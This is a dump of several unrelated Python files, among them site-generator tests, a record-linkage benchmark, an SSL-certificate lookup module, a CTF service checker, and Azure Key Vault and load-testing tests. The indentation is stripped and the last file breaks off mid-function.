with self.assertRaises(OSError):
olaf.is_valid_site()
open(os.path.join(os.getcwd(), 'config.py'), 'a').close()
self.assertTrue(olaf.is_valid_site())
def test_get_themes_list(self):
with self.runner.isolated_filesystem():
current_path = os.path.join(os.getcwd())
# invalid theme path
self.assertEqual(olaf.get_themes_list(current_path), [])
# create random number of theme folders
random_no = random.randint(1, 20)
for num in range(random_no):
temp_folder = os.path.join(
os.path.join(current_path, self.get_random_string()))
os.mkdir(temp_folder)
open(os.path.join(temp_folder, 'temp.txt'), 'a').close()
# check for newly created themes above
self.assertEqual(
len(olaf.get_themes_list(current_path)), random_no)
def test_get_theme_by_name(self):
# valid theme
self.assertIsNotNone(olaf.get_theme_by_name('basic'))
# invalid theme
self.assertIsNone(olaf.get_theme_by_name(self.get_random_string()))
with self.runner.isolated_filesystem():
# create a random theme
random_theme_name = self.get_random_string()
current_path = os.path.join(os.getcwd())
theme_path = os.path.join(current_path, 'themes', random_theme_name)
os.makedirs(theme_path)
open(os.path.join(theme_path, 'temp.txt'), 'a').close()
# check with random theme created above
self.assertIsNotNone(olaf.get_theme_by_name(random_theme_name))
def test_create_project_site(self):
with self.runner.isolated_filesystem():
random_project_name = self.get_random_string()
self.assertTrue(olaf.create_project_site(random_project_name))
files_to_check = ['__init__.py', 'config.py', 'disqus.html',
olaf.contents_dir,
os.path.join(olaf.contents_dir, olaf.posts_dir),
os.path.join(olaf.contents_dir, olaf.pages_dir)]
for f in files_to_check:
path = os.path.join(os.getcwd(), random_project_name, f)
self.assertTrue(os.path.exists(path))
def test_get_default_theme_name(self):
random_theme_name = self.get_random_string()
self.assertEqual(
olaf.get_default_theme_name(random_theme_name), random_theme_name)
self.assertEqual(
olaf.get_default_theme_name(None), olaf.default_theme)
# with self.runner.isolated_filesystem():
# with open(os.path.join(os.getcwd(), 'config.py'), 'w+') as f:
# f.write('SITE={"theme": "' + random_theme_name + '"}')
# self.assertEqual(
# olaf.get_default_theme_name(None), random_theme_name)
| python |
import random
from timeit import default_timer as timer
from clkhash.key_derivation import generate_key_lists
from clkhash.schema import get_schema_types
from clkhash.bloomfilter import calculate_bloom_filters
from clkhash.randomnames import NameList
from anonlink.entitymatch import *
from anonlink.util import popcount_vector, generate_clks, generate_bitarray
from anonlink.distributed_processing import calculate_filter_similarity
some_filters = generate_clks(10000)
def compute_popcount_speed(n):
"""
Just do as much counting of bits.
"""
clks = [generate_bitarray(1024) for _ in range(n)]
start = timer()
popcounts = popcount_vector(clks)
end = timer()
elapsed_time = end - start
print("{:6d} x 1024 bit popcounts in {:.6f} seconds".format(n, elapsed_time))
speed_in_MiB = n / (1024 * 8 * elapsed_time)
print("Popcount speed: {:.2f} MiB/s".format(speed_in_MiB))
return speed_in_MiB
def print_comparison_header():
print("Size 1 | Size 2 | Comparisons | Compute Time | Million Comparisons per second")
def compute_comparison_speed(n1=100, n2=100):
"""
Using the greedy solver, how fast can hashes be computed using one core.
"""
filters1 = [some_filters[random.randrange(0, 8000)] for _ in range(n1)]
filters2 = [some_filters[random.randrange(2000, 10000)] for _ in range(n2)]
start = timer()
result3 = calculate_mapping_greedy(filters1, filters2)
end = timer()
elapsed_time = end - start
print("{:6d} | {:6d} | {:12d} | {:8.3f}s | {:12.3f}".format(
n1, n2, n1*n2, elapsed_time, (n1*n2)/(1e6*elapsed_time)))
return elapsed_time
def compute_comparison_speed_parallel(n1=100, n2=100):
"""
Using the greedy solver in chunks, how fast can hashes be computed.
"""
filters1 = [some_filters[random.randrange(0, 8000)] for _ in range(n1)]
filters2 = [some_filters[random.randrange(2000, 10000)] for _ in range(n2)]
start = timer()
calculate_filter_similarity(filters1, filters2)
end = timer()
elapsed_time = end - start
print("{:6d} | {:6d} | {:12d} | {:8.3f}s | {:12.3f}".format(
n1, n2, n1*n2, elapsed_time, (n1*n2)/(1e6*elapsed_time)))
return elapsed_time
def compare_python_c(ntotal=10000, nsubset=6000, frac=0.8):
"""Compare results and running time of python and C++ versions.
:param ntotal: Total number of data points to generate
:param nsubset: Number of points for each database
:param frac: Fraction of overlap between subsets
:raises: AssertionError if the results differ
:return: dict with 'c' and 'python' keys with values of the total time taken
for each implementation
"""
nml = NameList(ntotal)
sl1, sl2 = nml.generate_subsets(nsubset, frac)
keys = generate_key_lists(('test1', 'test2'), len(nml.schema))
filters1 = calculate_bloom_filters(sl1, get_schema_types(nml.schema), keys)
filters2 = calculate_bloom_filters(sl2, get_schema_types(nml.schema), keys)
# Pure Python version
start = timer()
result = python_filter_similarity(filters1, filters2)
end = timer()
python_time = end - start
# C++ cffi version
start = timer()
result3 = cffi_filter_similarity_k(filters1, filters2, 1, 0.0)
end = timer()
cffi_time = end - start
assert result == result3, "Results are different between C++ cffi and Python"
# Results are the same
return {
"c": cffi_time,
"python": python_time
}
def benchmark(size, compare):
if compare:
print(compare_python_c(ntotal=1000, nsubset=600))
compute_popcount_speed(100000)
print_comparison_header()
possible_test_sizes = [
1000, 2000, 3000, 4000,
5000, 6000, 7000, 8000, 9000,
10000,
20000, 30000, 40000, 50000, 60000, 70000, 80000, 90000,
1000000,
2000000
]
for test_size in possible_test_sizes:
if test_size <= size:
compute_comparison_speed_parallel(
test_size, test_size
)
print("Single Core:")
compute_comparison_speed(5000, 5000)
if __name__ == '__main__':
benchmark(20000, False) | python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from conf.config import *
import ssl
import socket
import os
class Tool:
def __init__(self):
self.description = "Get the SSL certificate information"
self.options = {
'domain': {
"value": "",
"required": True,
"description": "The target domain (e.g. google.com)"
},
'sslPort': {
"value": "443",
"required": True,
"description": "Specify SSL Port (e.g. 443)"
}
}
self.output = {
"status": "",
"data": "",
"save": True
}
def run(self):
self._result = {}
self._pair = {}
hostname = self.options["domain"]["value"]
sslp = int(self.options["sslPort"]["value"])
print ('\n' + Y + '[!]' + Y + ' SSL Certificate Information : ' + W + '\n')
try:
# check the ssl port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect((hostname, sslp))
s.close()
# get the ssl certificate
ctx = ssl.create_default_context()
s = socket.socket()
s.settimeout(10)
sslSock = ctx.wrap_socket(s, server_hostname=self.options["domain"]["value"])
try:
sslSock.connect((hostname, sslp))
info = sslSock.getpeercert()
except Exception as e:
info = ssl.get_server_certificate((hostname, sslp))
f = open('{}.pem'.format(hostname), 'w')
f.write(info)
f.close()
cert_dict = ssl._ssl._test_decode_cert('{}.pem'.format(hostname))
info = cert_dict
os.remove('{}.pem'.format(hostname))
# process the ssl info
for k, v in info.items():
if isinstance(v, tuple):
self.unpack(v)
for k, v in self._pair.items():
print(G + '[+]' + C + ' {} : '.format(str(k)) + W + str(v))
self._result.update({str(k): str(v)})
self._pair.clear()
else:
print(G + '[+]' + C + ' {} : '.format(str(k)) + W + str(v))
self._result.update({str(k): str(v)})
print("")
self.output['status'] = "success"
self.output['data'] = self._result
except Exception as e:
print (R + '[-]' + C + ' Error : ' + W + str(e) + '\n')
self.output['status'] = "fail"
self.output['data'] = str(e)
# unpack the tuple
def unpack(self, v):
convert = False
for item in v:
if isinstance(item, tuple):
for subitem in item:
if isinstance(subitem, tuple):
for elem in subitem:
if isinstance(elem, tuple):
self.unpack(elem)
else:
convert = True
if convert == True:
self._pair.update(dict([subitem]))
else:
print(G + '[+]' + C + ' {} : '.format(str(v)) + W + str(item))
self._result.update({str(v): str(item)}) | python |
"""This module is a wrapper for the PuLP library, which is capable of
solving LP/MILP instances by using different kinds of solvers (like Gurobi or CBC).
The wrapper defines custom MILP and LP classes in order to simplify the instantiation of
problems from coefficient vectors and matrices."""
from .solverresult import SolverResult
from .milp import MILP, LP, GurobiMILP | python |
# Copyright 2022 Masatoshi Suzuki (@singletongue)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import gzip
import json
from unicodedata import normalize
from bs4 import BeautifulSoup
from tqdm import tqdm
SECTIONS_TO_IGNORE = ["脚注", "出典", "参考文献", "関連項目", "外部リンク"]
TAGS_TO_REMOVE = ["table"]
TAGS_TO_EXTRACT = ["p"]
# TAGS_TO_EXTRACT = ["p", "li"]
INNER_TAGS_TO_REMOVE = ["sup"]
def normalize_text(text):
text = normalize("NFKC", text)
text = " ".join(text.split())
text = "".join(char for char in text if char.isprintable())
text = text.strip()
return text
def extract_paragraphs_from_html(html):
soup = BeautifulSoup(html, features="lxml")
section_title = "__LEAD__"
section = soup.find(["section"])
while section:
if section.h2 is not None:
section_title = section.h2.text
for tag in section.find_all(TAGS_TO_REMOVE):
tag.clear()
for tag in section.find_all(TAGS_TO_EXTRACT):
for inner_tag in tag.find_all(INNER_TAGS_TO_REMOVE):
inner_tag.clear()
paragraph_text = normalize_text(tag.text)
yield (section_title, paragraph_text)
section = section.find_next_sibling(["section"])
def main(args):
with gzip.open(args.page_htmls_file, "rt") as f, gzip.open(args.output_file, "wt") as fo:
for line in tqdm(f):
input_item = json.loads(line.rstrip("\n"))
page_id = input_item["pageid"]
rev_id = input_item["revid"]
title = input_item["title"]
html = input_item["html"]
paragraph_index = 0
for (section_title, paragraph_text) in extract_paragraphs_from_html(html):
if section_title in SECTIONS_TO_IGNORE:
continue
if len(paragraph_text) < args.min_paragraph_length:
continue
if len(paragraph_text) > args.max_paragraph_length:
continue
output_item = {
"id": "{}-{}-{}".format(page_id, rev_id, paragraph_index),
"pageid": page_id,
"revid": rev_id,
"paragraph_index": paragraph_index,
"title": title,
"section": section_title,
"text": paragraph_text,
}
print(json.dumps(output_item, ensure_ascii=False), file=fo)
paragraph_index += 1
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--page_htmls_file", type=str, required=True)
parser.add_argument("--output_file", type=str, required=True)
parser.add_argument("--min_paragraph_length", type=int, default=10)
parser.add_argument("--max_paragraph_length", type=int, default=1000)
args = parser.parse_args()
main(args)
| python |
#!/usr/bin/python2
import sys
import math
import socket
import random
import time
import errno
# put-get flag to service success
def service_up():
print("[service is worked] - 101")
exit(101)
# service is available (available tcp connect) but protocol wrong could not put/get flag
def service_corrupt():
print("[service is corrupt] - 102")
exit(102)
# waited time (for example: 5 sec) but service did not have time to reply
def service_mumble():
print("[service is mumble] - 103")
exit(103)
# service is not available (maybe blocked port or service is down)
def service_down():
print("[service is down] - 104")
exit(104)
if len(sys.argv) != 5:
print("\nUsage:\n\t" + sys.argv[0] + " <host> (put|check) <flag_id> <flag>\n")
print("Example:\n\t" + sys.argv[0] + " \"127.0.0.1\" put \"abcdifghr\" \"123e4567-e89b-12d3-a456-426655440000\" \n")
print("\n")
exit(0)
host = sys.argv[1]
port = 4441
command = sys.argv[2]
f_id = sys.argv[3]
flag = sys.argv[4]
# test shot service
# daf;ld'lfsdasd
# will be mumble (2) - for test jury
# while True: time.sleep(1);
def put_flag():
global host, port, f_id, flag
# try put
try:
# print("try connect " + host + ":" + str(port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((host, port))
result = s.recv(1024)
# print(result)
s.send("put" + "\n")
result = s.recv(1024)
s.send(f_id + "\n")
result = s.recv(1024)
s.send(flag + "\n")
result = s.recv(1024)
s.close()
except socket.timeout:
service_down()
except socket.error as serr:
if serr.errno == errno.ECONNREFUSED:
service_down()
else:
print(serr)
service_corrupt()
except Exception as e:
print(e)
service_corrupt()
def check_flag():
global host, port, f_id, flag
# try get
flag2 = ""
try:
# print("try connect " + host + ":" + str(port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((host, port))
result = s.recv(1024)
# print(result)
s.send("get\n")
result = s.recv(1024)
s.send(f_id + "\n")
result = s.recv(1024)
flag2 = result.strip()
flag2 = flag2.split("FOUND FLAG: ");
if len(flag2) == 2:
flag2 = flag2[1]
else:
flag2 = ''
s.close()
except socket.timeout:
service_down()
except socket.error as serr:
if serr.errno == errno.ECONNREFUSED:
service_down()
else:
print(serr)
service_corrupt()
except Exception as e:
print(e)
service_corrupt()
if flag != flag2:
service_corrupt()
if command == "put":
put_flag()
check_flag()
service_up()
if command == "check":
check_flag()
service_up() | python |
from django.urls import path
from . import views
app_name = 'sqds_officers'
urlpatterns = [
path('<str:api_id>/geotb/', views.GeoTBPlayerView.as_view(), name='geo_tb'),
path('<str:api_id>/sepfarm/', views.SepFarmProgressView.as_view(), name='sep_farm')
]
| python |
import cv2
def undistort_image(img, mtx, dist):
'''
Undistorts image given a camera matrix and distortion coefficients
'''
undist_img = cv2.undistort(img, mtx, dist, None, mtx)
return undist_img
| python |
lista_inteiros = [
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
[9, 1, 8, 9, 9, 7, 2, 1, 6, 8],
[1, 3, 2, 2, 8, 6, 5, 9,6, 7],
[3, 8, 2, 8, 6, 7, 7, 3, 1, 9],
[4, 8, 8, 8, 5, 1, 10, 3, 1, 7],
[1, 3, 7, 2, 2, 1, 5, 1, 9, 9],
[10, 2, 2, 1, 3, 5, 1, 9, 9],
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
]
def encontra_duplicado(parametro):
numeros_checados = set()
primeiro_duplicado = -1
for numero in parametro:
if numero in numeros_checados:
primeiro_duplicado = numero
break
numeros_checados.add(numero)
return primeiro_duplicado
for c in lista_inteiros:
print(c, encontra_duplicado(c))
| python |
# Copyright 2015-2018 Capital One Services, LLC
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from ..azure_common import BaseTest, arm_template, cassette_name
from c7n_azure.resources.key_vault import (KeyVaultUpdateAccessPolicyAction, WhiteListFilter,
KeyVaultFirewallRulesFilter,
KeyVaultFirewallBypassFilter)
from c7n_azure.session import Session
from c7n_azure.utils import GraphHelper
from mock import patch, Mock
from msrestazure.azure_exceptions import CloudError
from netaddr import IPSet
from parameterized import parameterized
import pytest
from requests import Response
from c7n.utils import local_session
class KeyVaultTest(BaseTest):
def setUp(self):
super(KeyVaultTest, self).setUp()
def test_key_vault_schema_validate(self):
with self.sign_out_patch():
p = self.load_policy({
'name': 'test-key-vault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'whitelist',
'key': 'test'}
],
'actions': [
{'type': 'update-access-policy',
'operation': 'add',
'access-policies': []}
]
}, validate=True)
self.assertTrue(p)
@arm_template('keyvault.json')
@cassette_name('common')
def test_find_by_name(self):
p = self.load_policy({
'name': 'test-azure-keyvault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value_type': 'normalize',
'value': 'cckeyvault1*'}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
def test_compare_permissions(self):
p1 = {"keys": ['get'], "secrets": ['get'], "certificates": ['get']}
p2 = {"keys": ['Get', 'List'], "secrets": ['Get', 'List'], "certificates": ['Get', 'List']}
self.assertTrue(WhiteListFilter.compare_permissions(p1, p2))
p1 = {"keys": ['delete']}
p2 = {"keys": ['Get', 'List'], "secrets": ['Get', 'List'], "certificates": ['Get', 'List']}
self.assertFalse(WhiteListFilter.compare_permissions(p1, p2))
p1 = {"secrets": ['delete']}
p2 = {"keys": ['Get', 'List'], "secrets": ['Get', 'List'], "certificates": ['Get', 'List']}
self.assertFalse(WhiteListFilter.compare_permissions(p1, p2))
p1 = {"certificates": ['delete']}
p2 = {"keys": ['Get', 'List'], "secrets": ['Get', 'List'], "certificates": ['Get', 'List']}
self.assertFalse(WhiteListFilter.compare_permissions(p1, p2))
p1 = {}
p2 = {"keys": ['Get', 'List'], "secrets": ['Get', 'List'], "certificates": ['Get', 'List']}
self.assertTrue(WhiteListFilter.compare_permissions(p1, p2))
p1 = {"keys": ['get'], "secrets": ['get'], "certificates": ['get']}
p2 = {}
self.assertFalse(WhiteListFilter.compare_permissions(p1, p2))
# Requires Graph access
@arm_template('keyvault.json')
@pytest.mark.skiplive
def test_whitelist(self):
"""Tests basic whitelist functionality"""
p = self.load_policy({
'name': 'test-key-vault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value_type': 'normalize',
'value': 'cckeyvault1*'},
{'not': [
{'type': 'whitelist',
'key': 'principalName',
'users': ['[email protected]']}
]}
]
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('keyvault-no-policies.json')
def test_whitelist_zero_access_policies(self):
"""Tests that a keyvault with 0 access policies is processed properly
and doesn't raise an exception.
"""
p = self.load_policy({
'name': 'test-key-vault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value_type': 'normalize',
'value': 'cckeyvault2*'},
{'not': [
{'type': 'whitelist',
'key': 'principalName',
'users': ['[email protected]']}
]}
]
})
resources = p.run()
self.assertEqual(len(resources), 0)
@arm_template('keyvault.json')
@patch.object(GraphHelper, 'get_principal_dictionary')
def test_whitelist_not_authorized(self, get_principal_dictionary):
"""Tests that an exception is thrown when both:
The Microsoft Graph call fails.
This is mocked because it is impractical to have
identities with varying levels of graph access for
live test runs or recordings"""
mock_response = Mock(spec=Response)
mock_response.status_code = 403
mock_response.text = 'forbidden'
get_principal_dictionary.side_effect = CloudError(mock_response)
p = self.load_policy({
'name': 'test-key-vault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value_type': 'normalize',
'value': 'cckeyvault1*'},
{'not': [
{'type': 'whitelist',
'key': 'principalName',
'users': ['[email protected]']}
]}
]
})
with self.assertRaises(CloudError) as e:
p.run()
self.assertEqual(403, e.exception.status_code)
def test_update_access_policy_action(self):
with patch(self._get_key_vault_client_string() + '.update_access_policy')\
as access_policy_action_mock:
p = self.load_policy({
'name': 'test-azure-keyvault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value_type': 'normalize',
'value': 'cckeyvault1*'}],
'actions': [
{'type': 'update-access-policy',
'operation': 'replace',
'access-policies': [{
'tenant-id': '00000000-0000-0000-0000-000000000000',
'object-id': '11111111-1111-1111-1111-111111111111',
'permissions': {'keys': ['Get']}}]}]
})
p.run()
access_policy_action_mock.assert_called()
def test_transform_access_policies(self):
mock_access_policies = [{"object-id": "mockObjectId",
"tenant-id": "mockTenantId",
"permissions": {"keys": ["Get"]}}]
transformed_access_policies = KeyVaultUpdateAccessPolicyAction._transform_access_policies(
mock_access_policies).get("accessPolicies")[0]
self.assertTrue("objectId" in transformed_access_policies)
self.assertTrue("tenantId" in transformed_access_policies)
self.assertTrue("permissions" in transformed_access_policies)
def _get_key_vault_client_string(self):
client = local_session(Session) \
.client('azure.mgmt.keyvault.KeyVaultManagementClient').vaults
return client.__module__ + '.' + client.__class__.__name__
@arm_template('keyvault.json')
@cassette_name('common')
def test_firewall_rules_include(self):
p = self.load_policy({
'name': 'test-azure-keyvault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value': 'cckeyvault1*'},
{'type': 'firewall-rules',
'include': ['1.0.0.0']}],
})
resources = p.run()
self.assertEqual(len(resources), 1)
@arm_template('keyvault.json')
@cassette_name('common')
def test_firewall_rules_not_include_all_ranges(self):
p = self.load_policy({
'name': 'test-azure-keyvault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value': 'cckeyvault1*'},
{'type': 'firewall-rules',
'include': ['1.0.0.0', '127.0.0.1']}],
}, validate=True)
resources = p.run()
self.assertEqual(0, len(resources))
@arm_template('keyvault.json')
@cassette_name('common')
def test_firewall_rules_include_cidr(self):
p = self.load_policy({
'name': 'test-azure-keyvault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value': 'cckeyvault1*'},
{'type': 'firewall-rules',
'include': ['128.0.0.0/1']}],
}, validate=True)
resources = p.run()
self.assertEqual(1, len(resources))
@arm_template('keyvault.json')
@cassette_name('common')
def test_firewall_rules_not_include_cidr(self):
p = self.load_policy({
'name': 'test-azure-keyvault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value': 'cckeyvault1*'},
{'type': 'firewall-rules',
'include': ['127.0.0.0/8']}],
}, validate=True)
resources = p.run()
self.assertEqual(0, len(resources))
@arm_template('keyvault.json')
@cassette_name('common')
def test_firewall_rules_equal(self):
p = self.load_policy({
'name': 'test-azure-keyvault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value': 'cckeyvault1*'},
{'type': 'firewall-rules',
'equal': ['0.0.0.0-126.255.255.255', '128.0.0.0-255.255.255.255']}],
}, validate=True)
resources = p.run()
self.assertEqual(1, len(resources))
@arm_template('keyvault.json')
@cassette_name('common')
def test_firewall_rules_not_equal(self):
p = self.load_policy({
'name': 'test-azure-keyvault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'value',
'key': 'name',
'op': 'glob',
'value': 'cckeyvault1*'},
{'type': 'firewall-rules',
'equal': ['0.0.0.0-126.255.255.255', '128.0.0.0-255.255.255.254']}],
}, validate=True)
resources = p.run()
self.assertEqual(0, len(resources))
@arm_template('keyvault.json')
@cassette_name('common')
def test_firewall_bypass(self):
p = self.load_policy({
'name': 'test-azure-keyvault',
'resource': 'azure.keyvault',
'filters': [
{'type': 'firewall-bypass',
'mode': 'equal',
'list': ['AzureServices']}],
})
resources = p.run()
self.assertEqual(1, len(resources))
class KeyVaultFirewallFilterTest(BaseTest):
def test_query_empty_network_acl(self):
resource = {'properties': {}}
expected = IPSet(['0.0.0.0/0'])
self.assertEqual(expected, self._get_filter()._query_rules(resource))
def test_query_default_action_allow(self):
resource = {'properties': {'networkAcls': {'defaultAction': 'Allow'}}}
expected = IPSet(['0.0.0.0/0'])
self.assertEqual(expected, self._get_filter()._query_rules(resource))
def test_query_default_action_deny(self):
resource = {'properties': {'networkAcls': {'defaultAction': 'Deny',
'ipRules': [{'value': '10.0.0.0/16'},
{'value': '8.8.8.8'}]}}}
expected = IPSet(['8.8.8.8', '10.0.0.0/16'])
self.assertEqual(expected, self._get_filter()._query_rules(resource))
def _get_filter(self, mode='equal'):
data = {mode: ['10.0.0.0/8', '127.0.0.1']}
return KeyVaultFirewallRulesFilter(data, Mock())
class KeyVaultFirewallBypassFilterTest(BaseTest):
scenarios = [
[{}, []],
[{'networkAcls': {'defaultAction': 'Allow', 'bypass': ''}}, ['AzureServices']],
[{'networkAcls': {'defaultAction': 'Deny', 'bypass': ''}}, []],
[{'networkAcls': {'defaultAction': 'Deny', 'bypass': 'AzureServices'}},
['AzureServices']],
]
@parameterized.expand(scenarios)
def test_run(self, properties, expected):
resource = {'properties': properties}
f = KeyVaultFirewallBypassFilter({'mode': 'equal', 'list': []})
self.assertEqual(expected, f._query_bypass(resource))
| python |
from django.apps import AppConfig
class ScalprumConfig(AppConfig):
name = 'scalprum'
| python |
from typing import cast
import pytest
from parse import compile
from json import dumps as jsondumps
from behave.model import Table, Row
from grizzly.context import GrizzlyContext
from grizzly.types import RequestMethod, RequestDirection
from grizzly.tasks import TransformerTask, LogMessage, WaitTask
from grizzly.tasks.clients import HttpClientTask
from grizzly.steps import * # pylint: disable=unused-wildcard-import # noqa: F403
from grizzly_extras.transformer import TransformerContentType
from ....fixtures import BehaveFixture
def test_parse_method() -> None:
p = compile(
'value {method:Method} world',
extra_types=dict(
Method=parse_method,
),
)
for method in RequestMethod:
assert p.parse(f'value {method.name} world')['method'] == method
with pytest.raises(ValueError):
p.parse('value asdf world')
def test_parse_direction() -> None:
p = compile(
'value {direction:Direction} world',
extra_types=dict(
Direction=parse_direction,
),
)
for direction in RequestDirection:
assert p.parse(f'value {direction.name} world')['direction'] == direction
with pytest.raises(ValueError):
p.parse('value asdf world')
def test_step_task_request_with_name_to_endpoint_until(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = cast(GrizzlyContext, behave.grizzly)
assert len(grizzly.scenario.tasks) == 0
with pytest.raises(AssertionError) as ae:
step_task_request_with_name_to_endpoint_until(behave, RequestMethod.POST, 'test', '/api/test', '$.`this`[?status="ready"]')
assert 'this step is only valid for request methods with direction FROM' in str(ae)
behave.text = 'foo bar'
with pytest.raises(AssertionError) as ae:
step_task_request_with_name_to_endpoint_until(behave, RequestMethod.GET, 'test', '/api/test', '$.`this`[?status="ready"]')
assert 'this step does not have support for step text' in str(ae)
behave.text = None
with pytest.raises(ValueError) as ve:
step_task_request_with_name_to_endpoint_until(behave, RequestMethod.GET, 'test', '/api/test', '$.`this`[?status="ready"]')
assert 'content type must be specified for request' in str(ve)
step_task_request_with_name_to_endpoint_until(behave, RequestMethod.GET, 'test', '/api/test | content_type=json', '$.`this`[?status="ready"]')
assert len(grizzly.scenario.tasks) == 1
rows: List[Row] = []
rows.append(Row(['endpoint'], ['{{ variable }}']))
rows.append(Row(['endpoint'], ['foo']))
rows.append(Row(['endpoint'], ['bar']))
behave.table = Table(['endpoint'], rows=rows)
step_task_request_with_name_to_endpoint_until(behave, RequestMethod.GET, 'test', '/api/{{ endpoint }} | content_type=json', '$.`this`[?status="{{ endpoint }}"]')
assert len(grizzly.scenario.tasks) == 4
tasks = cast(List[UntilRequestTask], grizzly.scenario.tasks)
templates: List[str] = []
assert tasks[-1].request.endpoint == '/api/bar'
assert tasks[-1].condition == '$.`this`[?status="bar"]'
templates += tasks[-1].get_templates()
assert tasks[-2].request.endpoint == '/api/foo'
assert tasks[-2].condition == '$.`this`[?status="foo"]'
templates += tasks[-2].get_templates()
assert tasks[-3].request.endpoint == '/api/{{ variable }}'
assert tasks[-3].condition == '$.`this`[?status="{{ variable }}"]'
templates += tasks[-3].get_templates()
assert len(templates) == 2
assert sorted(templates) == sorted([
'$.`this`[?status="{{ variable }}"]',
'/api/{{ variable }}',
])
@pytest.mark.parametrize('method', RequestDirection.TO.methods)
def test_step_task_request_file_with_name_endpoint(behave_fixture: BehaveFixture, method: RequestMethod) -> None:
behave = behave_fixture.context
step_task_request_file_with_name_endpoint(behave, method, '{}', 'the_name', 'the_container')
@pytest.mark.parametrize('method', RequestDirection.FROM.methods)
def test_step_task_request_file_with_name_endpoint_wrong_direction(behave_fixture: BehaveFixture, method: RequestMethod) -> None:
behave = behave_fixture.context
with pytest.raises(AssertionError) as ae:
step_task_request_file_with_name_endpoint(behave, method, '{}', 'the_name', 'the_container')
assert f'{method.name} is not allowed' in str(ae)
@pytest.mark.parametrize('method', RequestDirection.TO.methods)
def test_step_task_request_file_with_name(behave_fixture: BehaveFixture, method: RequestMethod) -> None:
behave = behave_fixture.context
with pytest.raises(ValueError):
step_task_request_file_with_name(behave, method, '{}', f'{method.name}-test')
step_task_request_file_with_name_endpoint(behave, method, '{}', f'{method.name}-test', f'/api/test/{method.name.lower()}')
step_task_request_file_with_name(behave, method, '{}', f'{method.name}-test')
@pytest.mark.parametrize('method', RequestDirection.FROM.methods)
def test_step_task_request_file_with_name_wrong_direction(behave_fixture: BehaveFixture, method: RequestMethod) -> None:
behave = behave_fixture.context
with pytest.raises(AssertionError) as ae:
# step_request_to_payload_file_with_name_endpoint(behave, method, '{}', f'{method.name}-test', f'/api/test/{method.name.lower()}')
step_task_request_file_with_name(behave, method, '{}', f'{method.name}-test')
assert f'{method.name} is not allowed' in str(ae)
@pytest.mark.parametrize('method', RequestDirection.TO.methods)
def test_step_task_request_text_with_name_to_endpoint_to(behave_fixture: BehaveFixture, method: RequestMethod) -> None:
behave = behave_fixture.context
behave.text = '{}'
step_task_request_text_with_name_to_endpoint(behave, method, 'test-name', RequestDirection.TO, '/api/test')
with pytest.raises(AssertionError) as ae:
step_task_request_text_with_name_to_endpoint(behave, method, 'test-name', RequestDirection.FROM, '/api/test')
assert f'"from endpoint" is not allowed for {method.name}, use "to endpoint"' in str(ae)
@pytest.mark.parametrize('method', RequestDirection.FROM.methods)
def test_step_task_request_text_with_name_to_endpoint_from(behave_fixture: BehaveFixture, method: RequestMethod) -> None:
behave = behave_fixture.context
behave.text = '{}'
with pytest.raises(AssertionError) as ae:
step_task_request_text_with_name_to_endpoint(behave, method, 'test-name', RequestDirection.TO, '/api/test')
assert f'step text is not allowed for {method.name}' in str(ae)
with pytest.raises(AssertionError) as ae:
step_task_request_text_with_name_to_endpoint(behave, method, 'test-name', RequestDirection.FROM, '/api/test')
assert f'step text is not allowed for {method.name}' in str(ae)
@pytest.mark.parametrize('method', RequestDirection.FROM.methods)
def test_step_task_request_text_with_name_to_endpoint_no_text(behave_fixture: BehaveFixture, method: RequestMethod) -> None:
behave = behave_fixture.context
behave.text = None
step_task_request_text_with_name_to_endpoint(behave, method, 'test-name', RequestDirection.FROM, '/api/test')
with pytest.raises(AssertionError) as ae:
step_task_request_text_with_name_to_endpoint(behave, method, 'test-name', RequestDirection.TO, '/api/test')
assert f'"to endpoint" is not allowed for {method.name}, use "from endpoint"' in str(ae)
def test_step_task_request_text_with_name_to_endpoint_no_direction(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
with pytest.raises(AssertionError) as ae:
step_task_request_text_with_name_to_endpoint(behave, 'GET', 'test-name', 'asdf', '/api/test')
assert 'invalid direction specified in expression' in str(ae)
def test_step_task_request_text_with_name(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
behave.text = '{}'
with pytest.raises(ValueError):
step_task_request_text_with_name(behave, RequestMethod.POST, 'test-name')
step_task_request_text_with_name_to_endpoint(behave, RequestMethod.POST, 'test-name', RequestDirection.TO, '/api/test')
behave.text = None
with pytest.raises(ValueError):
